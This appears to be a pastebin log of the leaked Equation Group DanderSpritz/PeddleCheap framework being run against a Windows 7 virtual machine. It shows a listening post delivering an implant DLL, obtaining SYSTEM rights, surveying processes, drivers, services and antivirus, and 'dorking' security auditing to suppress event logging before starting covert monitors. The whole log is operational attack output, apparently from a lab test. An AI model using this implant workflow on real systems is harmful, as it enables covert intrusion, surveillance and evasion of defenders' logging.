Untitled

a guest
Apr 28th, 2017
[16:42:14] ID: 1 'script' started [target: z0.0.0.1]
Loading module 154 (addr=z0.0.0.1 | type=dsz | file=Script_Lp.dll)
Module loaded
- --------------------------------------------------

- Getting remote time
- RETRIEVED
Running command 'version'
Compiled :
Listening Post : 1.3.0
Implant : 1.3.0
Base :
DSZ 1.3.0 (1.3.0.0)

- --------------------------------------------------
- Performing setup for i386-winnt on z0.0.0.1
- --------------------------------------------------
- DISABLED - Authentication (LOCAL)
- DISABLED - DuplicateToken (LOCAL)
- DISABLED - Authentication (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - Oracle (LOCAL)
- DISABLED - AppCompat (LOCAL)
- DISABLED - InjectDll (LOCAL)
- DISABLED - Pc_Status (LOCAL)
- DISABLED - InjectDll (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - Flav_Control (LOCAL)
- DISABLED - kisu_install (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - kisu_survey (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - kisu_uninstall (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - kisu_upgrade (CURRENT) "32-bit binary on 64-bit OS"
- DISABLED - Break (LOCAL)
- DISABLED - Psp_Avoidance (LOCAL) "32-bit binary on 64-bit OS"
- DISABLED - QuitAndDelete (LOCAL)
- DISABLED - Audit (LOCAL)
- DISABLED - EventLogEdit (LOCAL)
- DISABLED - GetAdmin (LOCAL)
- DISABLED - Handles (LOCAL)
- DISABLED - Hide (LOCAL)
- DISABLED - Papercut (LOCAL)
- DISABLED - PasswordDump (LOCAL)
- DISABLED - Portmap (LOCAL)
- DISABLED - ProcessModify (LOCAL)
- DISABLED - ProcessOptions (LOCAL)
- DISABLED - RunAsChild (LOCAL)
- DISABLED - RunAsSystem (LOCAL)
- DISABLED - Shutdown (LOCAL)
- --------------------------------------------------

- Registering Mcl_NtElevation options
- SUCCESS
- Registering Mcl_NtNativeApi options
- SUCCESS
- Setting Mcl_NtNativeApi Type
- WIN32
- Registering Mcl_NtMemory options
- SUCCESS
- Setting Mcl_NtMemory Type
- DrNi
- Registering Mcl_ThreadInject options
- SUCCESS
- Setting Mcl_ThreadInject Type
- DrNi
- Getting host information
- RETRIEVED
- Getting OS GUID information
- RETRIEVED
- Storing host information
- STORED
- DISABLED - Authentication (LOCAL)
Unable to get target DB for unknown target

- --------------------------------------------------
- Registering global wrappers
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
- Added Ops library to Python search path.
- Local CP address is z0.0.0.1.
- Setting environment variable OPS_PROJECTNAME to 'win7op'
- Could not find DSZOpsDisk zip. Disk version NOT recorded.
- 1 of 8 startup items indicated failure to execute correctly.
- Session did not pass configuration sanity check. Close, clean up if necessary, and try again.
[16:42:46] ID: 134 'pc_listen' started [target: z0.0.0.1]
Loading module 158 (addr=z0.0.0.1 | type=dsz | file=PeddleCheap_Lp.dll)
Module loaded
Waiting for connection...
Setting Sockopt
Listening on [0.0.0.0]:443.
Setting Sockopt
Listening on [0.0.0.0]:80.
Setting Sockopt
Listening on [0.0.0.0]:53.
Setting Sockopt
Listening on [0.0.0.0]:1509.
Connection received from [192.168.1.58]:49172 to [192.168.1.3]:443...
Connection accepted
Starting session...
PC LP Version: 2.3.0
LP...ready to send the MAGIC NUMBER
Sending additional 363 bytes of random
LP ...ready to receive the symmetric key
LP...ready to decrypt the key

Remote Information
PC Version : 2.3.0
PC Id : 0x0000000000000000
Arch-Os : i386-winnt (compiled i386-winnt)
Session Key : ca 43 78 e9 9b f8 94 24 00 1d 26 37 52 eb ee 62

Getting remote OS information

Remote OS
Arch : i386
Compiled Arch : i386
Platform : winnt
Compiled Platform : winnt
Version : 6.1 (Windows 7)
Service Pack : 1
C Lib Version : 6.0.0

Sending OS version check status to remote side (4 bytes)
Data (OS version check status) has been sent
Data (OS version check status) has been received and stored by remote side

Ready to send implant
Successfully loaded LP DLLs

Payload
File Name : C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
Send payload : true
Original Size : 248832
Send Size : 137488
Checksum : c745
Name :
Path :
Export : #1


Sending PayloadInfo run type information
Sending File/Library info to remote side (36 bytes)
Data (File/Library info) has been sent
Data (File/Library info) has been received and stored by remote side

Sending Export name to remote side (3 bytes)
Data (Export name) has been sent
Data (Export name) has been received and stored by remote side

Sending Payload to remote side (137488 bytes)
Data (Payload) has been sent
Data (Payload) has been received and stored by remote side

... Receiving Acknowledgements

Received successful status message for Dll/Exe loaded
Received successful status message for About to run payload
Received successful status message for Exit This Message Loop


Setting remote address to z0.0.0.11
Remote Address : z0.0.0.11
Architecture : i386
Compiled Architecture : i386
Platform : winnt
Version : 6.1.1 (build 7601)
C Library Version : 6.0.0
Process Id : 448
Type : Dsz
Metadata : type=PC local=192.168.1.3:443 remote=192.168.1.58:49172

- Remote host is i386-winnt (6.1.1)
- --------------------------------------------------
- Performing setup for i386-winnt on z0.0.0.11
- --------------------------------------------------
- PROMPTED - Shutdown (CURRENT)
- Registering Mcl_NtElevation options
- SUCCESS
- Setting Mcl_NtElevation Type
- EpMe_GrSa
- Registering Mcl_NtNativeApi options
- SUCCESS
- Setting Mcl_NtNativeApi Type
- WIN32
- Registering Mcl_NtMemory options
- SUCCESS
- Setting Mcl_NtMemory Type
- Std
- Registering Mcl_ThreadInject options
- SUCCESS
- Setting Mcl_ThreadInject Type
- Std
Unable to get target DB for unknown target
Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- Current process options (0x4d)
- DisableExceptionChainValidation
- DisableThunkEmulation
- ExecutionDisabled
- Permanent
Do you want to modify the process options?
YES
- Verifying elevated 'query' results in 0x4d
- PASSED
- Modifying process options
- Process options modified
- DISABLED - Authentication (CURRENT)
- --------------------------------------------------

- Getting remote time
- RETRIEVED
- Getting host information
- RETRIEVED
- Getting OS GUID information
- RETRIEVED
- Storing host information
- STORED
- User is SYSTEM
- --------------------------------------------------

Running command 'python Connected/Connected.py -project Ops'
Unable to get target DB for unknown target
- --------------------------------------------------
- Re-registering global wrappers for current target
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
Showing you what we know so you can make a good decision in the menu below
crypto_guid: 6b166207-b512-4e13-8840-14fba0047b28
hostname: IE11Win7
macs: [u'08-00-27-61-eb-58']
implant_id: 0x0000000000000000

Below match threshold or multiple matches. You must choose. Choose wisely.

0) None of these - create a new target db

1) (Confidence: 0.8) explorenewworlds / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']
2) (Confidence: 0.8) test / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']

Enter selection:
0
- [2017-04-28 09:48:08 z0.0.0.11] This looks like a new target, and I have no idea where to put it.

0) Input project name manually

1) dszopsdisk
2) dszopsdisk-1
3) explorenewworlds
4) explornewworlds
5) guirequestlog
6) guisystemlog
7) logs
8) op1
9) test
10) win7op

Enter selection:
10
- [2017-04-28 09:48:14 z0.0.0.11] Target ID completed, ID 60877f4d-baab-4ebe-a6b3-b2d6e7ebe044 (in project win7op)
====================================================================
- [2017-04-28 09:48:15 z0.0.0.11] Showing ifconfig data so you can make sure you are on the correct target
FQDN: IE11Win7
DNS Servers: 192.168.1.1
- [2017-04-28 09:48:16 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
| Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
+--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
| Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |
Running command 'survey -run C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
Running command 'systemversion '
Architecture : i386
OS Family : winnt
Version : 6.1 (Build 7601)
Platform : Windows 7
Service Pack : 1.0
Extra Info : Service Pack 1
Product Type : Workstation / Professional
Terminal Services is installed, but only one interactive session is supported.

Command completed successfully
- [2017-04-28 09:48:18 z0.0.0.11] Loaded safety handlers from previous op(s)


Command completed successfully
Running command 'survey -run'

- [2017-04-28 09:48:19 z0.0.0.11] ================================== Process list ==================================================================
- [2017-04-28 09:48:22 z0.0.0.11] Data age: 01 seconds - data is fresh
- | PID | PPID | Full Path | User | Comment |
- +------+------+----------------------------------------------------------+------------------------------+------------------------------------------------------------+
- | 0 | 0 | | | |
- | 4 | 0 | System | | System Kernel |
- | 224 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem |
- | 296 | 288 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
- | 344 | 336 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
- | 352 | 288 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher |
- | 440 | 352 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller |
- | 548 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 616 | 440 | ------C:\Windows\system32\VBoxService.exe | NT AUTHORITY\SYSTEM | |
- | 680 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 784 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 824 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 2076 | 824 | ---------C:\Windows\system32\Dwm.exe | IE11WIN7\IEUser | Vista Desktop Window Manager |
- | 848 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 872 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 1132 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1256 | 440 | ------C:\Windows\System32\spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service |
- | 1288 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1412 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\NETWORK SERVICE | |
- | 1436 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
- | 1456 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
- | 1480 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
- | 1504 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
- | 1600 | 440 | ------C:\Windows\system32\wlms\wlms.exe | NT AUTHORITY\SYSTEM | |
- | 1912 | 440 | ------C:\Windows\system32\sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service |
- | 252 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1652 | 440 | ------C:\Windows\system32\taskhost.exe | IE11WIN7\IEUser | Windows 7 Generic Host Process |
- | 2636 | 440 | ------C:\Windows\system32\SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer |
- | 2764 | 440 | ------C:\Program Files\Windows Media Player\wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service |
- | 2936 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 3616 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 448 | 352 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem |
- | 456 | 352 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager |
- | 384 | 336 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process |
- | 2108 | 2056 | C:\Windows\Explorer.EXE | IE11WIN7\IEUser | Windows Explorer Shell |
- | 2360 | 2108 | ---C:\Windows\System32\VBoxTray.exe | IE11WIN7\IEUser | |
background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" "

- [2017-04-28 09:48:23 z0.0.0.11] ===================================== Uptime =====================================================================
Uptime: 0 days, 0:15:46

- [2017-04-28 09:48:25 z0.0.0.11] ================== Auditing status check, dorking will be later ==================================================
- [2017-04-28 09:48:25 z0.0.0.11] 1 safety handler registered for audit
- [2017-04-28 09:48:26 z0.0.0.11] Data age: 00 seconds - data is fresh
- [2017-04-28 09:48:27 z0.0.0.11] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
- [2017-04-28 09:48:27 z0.0.0.11] The above is only being shown for informational purposes, you will be prompted about dorking later

- [2017-04-28 09:48:27 z0.0.0.11] =================================== Driver list ===================================================================
Running command 'python C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- [2017-04-28 09:48:28 z0.0.0.11] 1 safety handler registered for drivers
- | Driver | Path | Flags | Comment | Type | First Seen | Also On |
- +------------------------------------------+-----------------------------+--------------------------+----------------------------------------------------+---------+------------+-------------------+
- | api-ms-win-downlevel-normaliz-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- | api-ms-win-downlevel-user32-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- | dump_atapi.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- | dump_dumpata.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- | dump_dumpfve.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
- | userenv.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- | vboxdisp.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
- | vboxguest.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Guest Additions Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- | vboxmouse.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Mouse Filter Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- | vboxsf.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Shared Folders Minirdr Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
- | vboxvideo.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Video Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |

Command completed successfully

- [2017-04-28 09:48:53 z0.0.0.11] =============================== Installed software ===============================================================

- --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- [2017-04-28 09:48:54 z0.0.0.11] Data age: 01 seconds - data is fresh
| Arcitecture | Name | Description | Installed version | Date installed |
+-------------+---------------------------------------------+-----------------------+-------------------+----------------+
| 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | |
| 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | 2014-11-21 |
| 32-bit | Oracle VM VirtualBox Guest Additions 4.3.12 | Oracle Corporation | 4.3.12.0 | |

- ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- [2017-04-28 09:48:55 z0.0.0.11] Data age: 00 seconds - data is fresh
| Architecture | Name | Last update |
+--------------+------------------------+-------------+
| 32-bit | ATI Technologies | 2009-07-14 |
| 32-bit | Classes | 2014-11-26 |
| 32-bit | Clients | 2009-07-14 |
| 32-bit | Intel | 2009-07-14 |
| 32-bit | Microsoft | 2017-04-28 |
| 32-bit | MozillaPlugins | 2013-10-23 |
| 32-bit | ODBC | 2009-07-14 |
| 32-bit | Oracle | 2014-11-26 |
| 32-bit | Policies | 2009-07-14 |
| 32-bit | RegisteredApplications | 2009-07-14 |
| 32-bit | Sonic | 2009-07-14 |

- -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- [2017-04-28 09:48:57 z0.0.0.11] Data age: 01 seconds - data is fresh
| Architecture | Folder Name | Modified |
+--------------+--------------------------+-------------------------------+
| 32-bit | Common Files | 2009-07-14T02:37:05.485289900 |
| 32-bit | DVD Maker | 2013-10-23T19:17:04.354000000 |
| 32-bit | Internet Explorer | 2014-11-26T19:47:13.343750000 |
| 32-bit | Microsoft.NET | 2013-10-23T17:55:12.097875000 |
| 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 |
| 32-bit | Oracle | 2014-11-26T21:42:36.486305600 |
| 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 |
| 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 |
| 32-bit | Windows Defender | 2013-10-23T20:51:10.385625000 |
| 32-bit | Windows Journal | 2014-11-22T01:41:33.521125000 |
| 32-bit | Windows Mail | 2013-10-23T19:17:04.525875000 |
| 32-bit | Windows Media Player | 2013-10-23T19:16:59.307125000 |
| 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 |
| 32-bit | Windows Photo Viewer | 2013-10-23T19:16:59.213375000 |
| 32-bit | Windows Portable Devices | 2013-10-23T19:16:59.338375000 |
| 32-bit | Windows Sidebar | 2013-10-23T19:17:04.479000000 |

- [2017-04-28 09:48:58 z0.0.0.11] ================================ Running services ================================================================
- [2017-04-28 09:48:59 z0.0.0.11] Data age: 01 seconds - data is fresh
| Display name | Service name |
+--------------------------------------------------+----------------------+
| Windows Audio Endpoint Builder | AudioEndpointBuilder |
| Windows Audio | Audiosrv |
| Base Filtering Engine | BFE |
| Computer Browser | Browser |
| Certificate Propagation | CertPropSvc |
| Cryptographic Services | CryptSvc |
| Offline Files | CscService |
| DCOM Server Process Launcher | DcomLaunch |
| DHCP Client | Dhcp |
| DNS Client | Dnscache |
| Diagnostic Policy Service | DPS |
| Windows Event Log | eventlog |
| COM+ Event System | EventSystem |
| Function Discovery Provider Host | fdPHost |
| Function Discovery Resource Publication | FDResPub |
| Windows Font Cache Service | FontCache |
| Group Policy Client | gpsvc |
| HomeGroup Provider | HomeGroupProvider |
| IKE and AuthIP IPsec Keying Modules | IKEEXT |
| IP Helper | iphlpsvc |
| Server | LanmanServer |
| Workstation | LanmanWorkstation |
| TCP/IP NetBIOS Helper | lmhosts |
| Windows Firewall | MpsSvc |
| Network Connections | Netman |
| Network List Service | netprofm |
| Network Location Awareness | NlaSvc |
| Network Store Interface Service | nsi |
| Plug and Play | PlugPlay |
| IPsec Policy Agent | PolicyAgent |
| Power | Power |
| User Profile Service | ProfSvc |
| RPC Endpoint Mapper | RpcEptMapper |
| Remote Procedure Call (RPC) | RpcSs |
| Security Accounts Manager | SamSs |
| Task Scheduler | Schedule |
| System Event Notification Service | SENS |
| Remote Desktop Configuration | SessionEnv |
| Shell Hardware Detection | ShellHWDetection |
| Print Spooler | Spooler |
| Software Protection | sppsvc |
| SSDP Discovery | SSDPSRV |
| Remote Desktop Services | TermService |
| Themes | Themes |
| Distributed Link Tracking Client | TrkWks |
| Remote Desktop Services UserMode Port Redirector | UmRdpService |
| Desktop Window Manager Session Manager | UxSms |
| VirtualBox Guest Additions Service | VBoxService |
| Hyper-V Heartbeat Service | vmicheartbeat |
| Hyper-V Data Exchange Service | vmickvpexchange |
| Hyper-V Guest Shutdown Service | vmicshutdown |
| Hyper-V Time Synchronization Service | vmictimesync |
| Hyper-V Volume Shadow Copy Requestor | vmicvss |
| Diagnostic Service Host | WdiServiceHost |
| Diagnostic System Host | WdiSystemHost |
| Windows Defender | WinDefend |
| WinHTTP Web Proxy Auto-Discovery Service | WinHttpAutoProxySvc |
| Windows Management Instrumentation | Winmgmt |
| Windows Licensing Monitoring Service | WLMS |
| Windows Media Player Network Sharing Service | WMPNetworkSvc |
| Security Center | wscsvc |
| Windows Search | WSearch |
| Windows Update | wuauserv |

- [2017-04-28 09:49:00 z0.0.0.11] =================================== AV Check!!! ===================================================================
Running command 'python windows\checkpsp.py -project Ops '
- Checking for any running known PSP's...
- microsoft
-

- Checking for target PSP history...

- No target history found.

- Saw PSP's we can act on. Running scripts.
- ============================================
- = microsoft =
- ============================================
- Checking for a change in configuration

- The following PSPs were NEWLY ADDED to target:
- Microsoft Windows Defender Windows 7 Enterprise
- +--------------------+----------------------+
- | | Setting Value |
- +--------------------+----------------------+
- | Vendor | Microsoft |
- | Product | Windows Defender |
- | Version | Windows 7 Enterprise |
- | Definition Updates | None |
- | Information | None |
- | Install Date | None |
- | Log File | None |
- | Quarantine | None |
- | ServiceStart | 2 |
- | Software | PSP |
- | SpyNet | 1 |
- | Status | Enabled |
- +--------------------+----------------------+

Command completed successfully

- [2017-04-28 09:49:11 z0.0.0.11] ================================ Auditing dorking ================================================================
- [2017-04-28 09:49:11 z0.0.0.11] Data age: 45 seconds (from local cache, re-run manually if you need to)
- [2017-04-28 09:49:11 z0.0.0.11] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
Do you want to dork security auditing?
YES
- [2017-04-28 09:49:34 z0.0.0.11] Security auditing dorked, do not stop command 311 or you will lose your blessing

- [2017-04-28 09:49:34 z0.0.0.11] ==================================== Monitors ====================================================================
Monitors
-----------------------------
1) Full - arp, netstat, activity
2) Netstat and activity
3) Activity only

4) Done

Select your monitors (full recommended for most situations): [1]
Staring a monitor with activity -monitor
- [2017-04-28 09:49:41 z0.0.0.11] Activity monitor started (or already running)
Staring a monitor with netconnections -monitor
- [2017-04-28 09:49:42 z0.0.0.11] Netconnections monitor started (or already running)
z0.0.0.11: [2017-04-28 09:49:43] Hashhunter completed on IE11Win7!
Staring a monitor with arp -delay 10s -monitor
- [2017-04-28 09:49:44 z0.0.0.11] Arp monitor started (or already running)
- [2017-04-28 09:49:45 z0.0.0.11] Process deep started in the background as command ID 329.
- [2017-04-28 09:49:45 z0.0.0.11] Informational SIG check started in the background as command ID 330.

- [2017-04-28 09:49:45 z0.0.0.11] ================================ Scheduler survey ================================================================
- [2017-04-28 09:49:57 z0.0.0.11] Data age: 09 seconds (from local cache, re-run manually if you need to)
| source | command | nextrun | triggers | runas | jobname |
+---------+-------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+
| SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) |
| SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy |
| SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask |
| SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator |
| SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask |
| SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip |
| SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag |
| SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector |
| SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications |
| SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService |
  585. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks |
  586. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit |
  587. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady |
  588. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate |
  589. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
  590. | SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
  591. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
  592. | SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
